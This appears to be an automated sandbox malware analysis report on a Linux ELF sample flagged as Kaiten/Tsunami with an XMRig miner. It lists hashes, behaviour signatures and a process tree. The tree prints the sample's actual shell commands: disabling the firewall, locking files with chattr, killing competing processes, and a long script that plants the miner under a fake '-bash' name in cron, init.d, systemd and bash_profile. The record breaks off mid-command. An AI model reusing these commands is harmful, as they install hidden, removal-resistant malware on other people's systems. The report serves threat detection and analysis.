Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu2404-amd64-20240523-en, kernel:6.8.0-31-generic, locale:en-us, os:ubuntu-24.04-amd64, system
  • submitted
    11-10-2024 20:27

General

  • Target

    SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf

  • Size

    3.2MB

  • MD5

    396a812c15bd9809d0c8f438b8517827

  • SHA1

    6a8eb0ee0a05cede17a50ec04b0a549d70325dcb

  • SHA256

    d8a12c39742e862d3c2a72bc85532deb7b62665357a357bf6a4f2ea3ceb8561a

  • SHA512

    83ba44b59c9aa517887d27de612b646a17e1b0e372e216e279f188a75e12759b27f181509287e08e79aa34872b59b711fc8efd014b463f58934f762a8d70e948

  • SSDEEP

    98304:EenYv0GcTOR0aUripytWEGYk91lRujZv9I:bYoOjGhnGPLlqZvW

Malware Config

Signatures

  • Detects Kaiten/Tsunami Payload 1 IoCs
  • Detects Kaiten/Tsunami payload 1 IoCs
  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

  • xmrig

    XMRig is a high-performance, open-source, cross-platform CPU/GPU miner.

  • XMRig Miner payload 2 IoCs
  • File and Directory Permissions Modification 1 TTPs 3 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 4 IoCs
  • Attempts to change immutable files 17 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Checks hardware identifiers (DMI) 1 TTPs 8 IoCs

    Checks DMI information that indicates whether the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 17 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates active TCP sockets 1 TTPs 3 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Enumerates running processes

    Discovers information about currently running processes on the system.

  • Modifies init.d 2 TTPs 3 IoCs

    Adds or modifies a system service, likely for persistence.

  • Modifies systemd 2 TTPs 3 IoCs

    Adds or modifies systemd service files, likely to achieve persistence.

  • Reads hardware information 1 TTPs 28 IoCs

    Accesses system information such as serial numbers and manufacturer names.

  • Writes file to system bin folder 5 IoCs
  • Security Software Discovery 1 TTPs 2 IoCs

    Adversaries may attempt to discover installed security software and its configurations.

  • UPX packed file 3 IoCs

    Detects executables packed with the open-source UPX packer or a modified UPX.

  • Changes its process name 1 IoCs
  • Checks CPU configuration 1 TTPs 8 IoCs

    Checks CPU information that indicates whether the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 17 IoCs
  • Reads system network configuration 1 TTPs 40 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Process Discovery 1 TTPs 2 IoCs

    Adversaries may try to discover information about running processes.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 6 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf
    /tmp/SecuriteInfo.com.Linux.Siggen.7706.4895.27444.elf
    Depth: 1
    • Creates/modifies Cron job
    • Enumerates active TCP sockets
    • Modifies init.d
    • Modifies systemd
    • Writes file to system bin folder
    • Reads system network configuration
    • Reads runtime system information
    • Writes file to tmp directory
    PID:2435
    • /usr/bin/bash
      bash -c "ufw disable"
      Depth: 2
      PID:2442
    • /usr/bin/lsof
      lsof -t -i :444
      Depth: 2
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:2443
    • /usr/bin/lsof
      lsof -t -i :59475
      Depth: 2
      • Enumerates active TCP sockets
      • Reads system network configuration
      • Reads runtime system information
      PID:2455
    • /usr/bin/pgrep
      pgrep -f ksysrvthread
      Depth: 2
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Reads runtime system information
      PID:2463
    • /usr/bin/pgrep
      pgrep -f sysrv
      Depth: 2
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Reads runtime system information
      PID:2464
    • /usr/bin/pgrep
      pgrep -f klibsystem4
      Depth: 2
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Reads runtime system information
      PID:2465
    • /usr/bin/pgrep
      pgrep -f klibsystem5
      Depth: 2
      • Reads CPU attributes
      • Reads runtime system information
      PID:2466
    • /usr/bin/chattr
      chattr +ia /etc/init.d/dpkg-deb-package
      Depth: 2
      PID:2467
    • /etc/init.d/dpkg-deb-package
      /etc/init.d/dpkg-deb-package start
      Depth: 2
      • Executes dropped EXE
      PID:2468
      • /usr/bin/cp
        cp -f -r -- /bin/dpkg-debian /bin/dpkg-deb-package
        Depth: 3
        PID:2469
      • /usr/bin/nohup
        nohup ./dpkg-deb-package
        Depth: 3
        PID:2470
      • /usr/bin/rm
        rm -rf -- dpkg-deb-package
        Depth: 3
        PID:2471
      • /usr/bin/dpkg-deb-package
        ./dpkg-deb-package
        Depth: 3
        PID:2470
    • /usr/bin/chattr
      chattr +ia /etc/systemd/system/dpkg-deb-package.service
      Depth: 2
      PID:2473
    • /usr/bin/systemctl
      systemctl daemon-reload
      Depth: 2
      PID:2474
    • /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004
      /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
      Depth: 2
      • Executes dropped EXE
      • Checks hardware identifiers (DMI)
      • Reads hardware information
      • Checks CPU configuration
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Writes file to tmp directory
      PID:2475
      • /bin/sh
        sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
        Depth: 3
        PID:2570
        • /usr/bin/hostname
          hostname -I
          Depth: 4
          PID:2575
        • /usr/bin/awk
          awk "{print \$1}"
          Depth: 4
          PID:2578
        • /usr/bin/cat
          cat /etc/ssh/sshd_config
          Depth: 4
          PID:2589
        • /usr/bin/grep
          grep "Port "
          Depth: 4
          PID:2591
        • /usr/bin/head
          head -n 1
          Depth: 4
          PID:2592
        • /usr/bin/awk
          awk "{print \"-\"\$2}"
          Depth: 4
          PID:2593
        • /usr/bin/whoami
          whoami
          Depth: 4
          PID:2599
        • /usr/bin/hostname
          hostname
          Depth: 4
          PID:2603
        • /usr/bin/grep
          grep -c "^processor" /proc/cpuinfo
          Depth: 4
          • Checks CPU configuration
          PID:2607
        • /usr/bin/grep
          grep -m 1 "model name" /proc/cpuinfo
          Depth: 4
          • Checks CPU configuration
          PID:2610
        • /usr/bin/cut
          cut -d: -f2
          Depth: 4
          PID:2611
        • /usr/bin/sed
          sed -e "s/^ *//"
          Depth: 4
          PID:2612
        • /usr/bin/sed
          sed -e "s/\$//"
          Depth: 4
          PID:2613
        • /usr/bin/awk
          awk "{print \$1}"
          Depth: 4
          PID:2620
        • /usr/bin/awk
          awk "{print \$4}"
          Depth: 4
          PID:2623
        • /usr/bin/awk
          awk "{print \$4}"
          Depth: 4
          PID:2627
        • /usr/bin/awk
          awk "{print \$3}"
          Depth: 4
          PID:2630
        • /usr/bin/awk
          awk "{print \$4}"
          Depth: 4
          PID:2633
        • /usr/bin/awk
          awk "{print \$1}"
          Depth: 4
          PID:2636
        • /usr/bin/awk
          awk "{print \$2\" \"\$3\" \"\$4}"
          Depth: 4
          PID:2638
      • /bin/sh
        sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
        Depth: 3
        PID:2639
        • /usr/bin/ps
          ps -A "-ostat,ppid"
          Depth: 4
          • Reads CPU attributes
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:2640
        • /usr/bin/awk
          awk "/[zZ]/ && !a[\$2]++ {print \$2}"
          Depth: 4
          PID:2641
        • /usr/bin/id
          id -u
          Depth: 4
          PID:2643
        • /usr/bin/ps
          ps x
          Depth: 4
          • Reads CPU attributes
          • Enumerates kernel/hardware configuration
          • Reads runtime system information
          PID:2644
        • /usr/bin/grep
          grep /etc/cron
          Depth: 4
          PID:2645
        • /usr/bin/grep
          grep -v grep
          Depth: 4
          PID:2646
      • /bin/sh
        sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
        Depth: 3
        • Security Software Discovery
        PID:2648
        • /usr/bin/id
          id -u
          Depth: 4
          PID:2649
        • /usr/bin/ps
          ps aux
          Depth: 4
          • Checks CPU configuration
          • Reads CPU attributes
          • Process Discovery
          • Reads runtime system information
          PID:2650
        • /usr/bin/grep
          grep -v grep
          Depth: 4
          PID:2651
        • /usr/bin/grep
          grep -v -- "-bash[[:space:]]*\$"
          Depth: 4
          PID:2652
        • /usr/bin/grep
          grep -v /usr/sbin/httpd
          Depth: 4
          PID:2653
        • /usr/bin/awk
          awk "{if(\$3>30.0) print \$2}"
          Depth: 4
          PID:2654
      • /bin/sh
        sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
        Depth: 3
        • Security Software Discovery
        PID:2661
        • /usr/bin/id
          id -u
          Depth: 4
          PID:2662
        • /usr/bin/ps
          ps aux
          Depth: 4
          • Checks CPU configuration
          • Reads CPU attributes
          • Enumerates kernel/hardware configuration
          • Process Discovery
          • Reads runtime system information
          PID:2664
        • /usr/bin/grep
          grep -v grep
          Depth: 4
          PID:2665
        • /usr/bin/grep
          grep -- "-bash[[:space:]]*\$"
          Depth: 4
          PID:2666
        • /usr/bin/awk
          awk "{if(\$3>30.0) print \$2}"
          Depth: 4
          PID:2667
        • /usr/bin/wc
          wc -l
          Depth: 4
          PID:2668
    • /usr/bin/systemctl
      systemctl enable dpkg-deb-package.service
      Depth: 2
      • Changes its process name
      PID:2657
      • /usr/bin/getopt
        getopt -o r: --long root: -- enable dpkg-deb-package
        Depth: 3
        PID:2659
      • /usr/sbin/update-rc.d
        /usr/sbin/update-rc.d dpkg-deb-package defaults
        Depth: 3
        PID:2660
        • /usr/local/sbin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2669
        • /usr/local/bin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2669
        • /usr/sbin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2669
        • /usr/bin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2669
      • /usr/sbin/update-rc.d
        /usr/sbin/update-rc.d dpkg-deb-package enable
        Depth: 3
        PID:2800
        • /usr/local/sbin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2801
        • /usr/local/bin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2801
        • /usr/sbin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2801
        • /usr/bin/systemctl
          systemctl daemon-reload
          Depth: 4
          PID:2801
    • /usr/bin/chattr
      chattr +ia /bin/dpkg-debian
      Depth: 2
      PID:3051
    • /usr/bin/crontab
      crontab -r
      Depth: 2
      PID:3052
    • /usr/bin/pkill
      pkill -f .klibsystem4
      Depth: 2
      • Reads CPU attributes
      • Reads runtime system information
      PID:3053
    • /usr/bin/bash
      bash -c "echo \"5 * * * * nohup /tmp/.klibsystem5 >/dev/null 2>&1 &\" | crontab -"
      Depth: 2
      PID:3054
      • /usr/bin/crontab
        crontab -
        Depth: 3
        • Creates/modifies Cron job
        PID:3056
    • /usr/bin/chattr
      chattr +ia /etc/cron.d/.lib-knlib4
      Depth: 2
      PID:3057
    • /usr/bin/chattr
      chattr +ia /var/spool/cron/.lib-knlib4
      Depth: 2
      PID:3058
    • /usr/bin/chattr
      chattr +ia /etc/cron.hourly/.lib-knlib4
      Depth: 2
      PID:3059
                                                                                                                          • /usr/bin/chattr
                                                                                                                            chattr +ia /etc/cron.daily/.lib-knlib4
                                                                                                                            2⤵
                                                                                                                              PID:3060
                                                                                                                            • /usr/bin/chattr
                                                                                                                              chattr +ia /etc/cron.weekly/.lib-knlib4
                                                                                                                              2⤵
                                                                                                                                PID:3061
                                                                                                                              • /usr/bin/chattr
                                                                                                                                chattr +ia /etc/cron.monthly/.lib-knlib4
                                                                                                                                2⤵
                                                                                                                                  PID:3062
                                                                                                                                • /usr/bin/chattr
                                                                                                                                  chattr -ia /etc/anacrontab
                                                                                                                                  2⤵
                                                                                                                                  • Attempts to change immutable files
                                                                                                                                  PID:3063
                                                                                                                                • /usr/bin/chattr
                                                                                                                                  chattr +ia /etc/anacrontab
                                                                                                                                  2⤵
                                                                                                                                  • Attempts to change immutable files
                                                                                                                                  PID:3064
                                                                                                                                • /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004
                                                                                                                                  /tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004 -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks hardware identifiers (DMI)
                                                                                                                                  • Reads hardware information
                                                                                                                                  • Checks CPU configuration
                                                                                                                                  • Reads CPU attributes
                                                                                                                                  • Enumerates kernel/hardware configuration
                                                                                                                                  PID:3065
                                                                                                                                  • /bin/sh
                                                                                                                                    sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
                                                                                                                                    3⤵
                                                                                                                                    • Attempts to change immutable files
                                                                                                                                    PID:3066
                                                                                                                                    • /usr/bin/hostname
                                                                                                                                      hostname -I
                                                                                                                                      4⤵
                                                                                                                                      • Attempts to change immutable files
                                                                                                                                      PID:3069
                                                                                                                                    • /usr/bin/awk
                                                                                                                                      awk "{print \$1}"
                                                                                                                                      4⤵
                                                                                                                                        PID:3071
                                                                                                                                      • /usr/bin/cat
                                                                                                                                        cat /etc/ssh/sshd_config
                                                                                                                                        4⤵
                                                                                                                                          PID:3073
                                                                                                                                        • /usr/bin/grep
                                                                                                                                          grep "Port "
                                                                                                                                          4⤵
                                                                                                                                            PID:3074
                                                                                                                                          • /usr/bin/head
                                                                                                                                            head -n 1
                                                                                                                                            4⤵
                                                                                                                                              PID:3075
                                                                                                                                            • /usr/bin/awk
                                                                                                                                              awk "{print \"-\"\$2}"
                                                                                                                                              4⤵
                                                                                                                                                PID:3076
                                                                                                                                              • /usr/bin/whoami
                                                                                                                                                whoami
                                                                                                                                                4⤵
                                                                                                                                                  PID:3077
                                                                                                                                                • /usr/bin/hostname
                                                                                                                                                  hostname
                                                                                                                                                  4⤵
                                                                                                                                                    PID:3078
                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                    grep -c "^processor" /proc/cpuinfo
                                                                                                                                                    4⤵
                                                                                                                                                    • Checks CPU configuration
                                                                                                                                                    PID:3079
                                                                                                                                                  • /usr/bin/grep
                                                                                                                                                    grep -m 1 "model name" /proc/cpuinfo
                                                                                                                                                    4⤵
                                                                                                                                                    • Checks CPU configuration
                                                                                                                                                    PID:3082
                                                                                                                                                  • /usr/bin/cut
                                                                                                                                                    cut -d: -f2
                                                                                                                                                    4⤵
                                                                                                                                                      PID:3083
                                                                                                                                                    • /usr/bin/sed
                                                                                                                                                      sed -e "s/^ *//"
                                                                                                                                                      4⤵
                                                                                                                                                        PID:3084
                                                                                                                                                      • /usr/bin/sed
                                                                                                                                                        sed -e "s/\$//"
                                                                                                                                                        4⤵
                                                                                                                                                          PID:3085
                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                          awk "{print \$1}"
                                                                                                                                                          4⤵
                                                                                                                                                            PID:3088
                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                            awk "{print \$4}"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3091
                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                              awk "{print \$4}"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3094
                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                awk "{print \$3}"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3097
                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                  awk "{print \$4}"
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:3100
                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                    awk "{print \$1}"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:3103
                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                      awk "{print \$2\" \"\$3\" \"\$4}"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3105
                                                                                                                                                                    • /bin/sh
                                                                                                                                                                      sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:3106
                                                                                                                                                                        • /usr/bin/ps
                                                                                                                                                                          ps -A "-ostat,ppid"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Reads CPU attributes
                                                                                                                                                                          • Enumerates kernel/hardware configuration
                                                                                                                                                                          • Reads runtime system information
                                                                                                                                                                          PID:3107
                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                          awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3108
                                                                                                                                                                          • /usr/bin/id
                                                                                                                                                                            id -u
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:3110
                                                                                                                                                                            • /usr/bin/ps
                                                                                                                                                                              ps x
                                                                                                                                                                              4⤵
                                                                                                                                                                              • Reads CPU attributes
                                                                                                                                                                              • Enumerates kernel/hardware configuration
                                                                                                                                                                              • Reads runtime system information
                                                                                                                                                                              PID:3111
                                                                                                                                                                            • /usr/bin/grep
                                                                                                                                                                              grep /etc/cron
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3112
                                                                                                                                                                              • /usr/bin/grep
                                                                                                                                                                                grep -v grep
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3113
                                                                                                                                                                              • /bin/sh
                                                                                                                                                                                  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-3c8db507-bf9e-4d4a-bb3f-dcfad383b004';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> 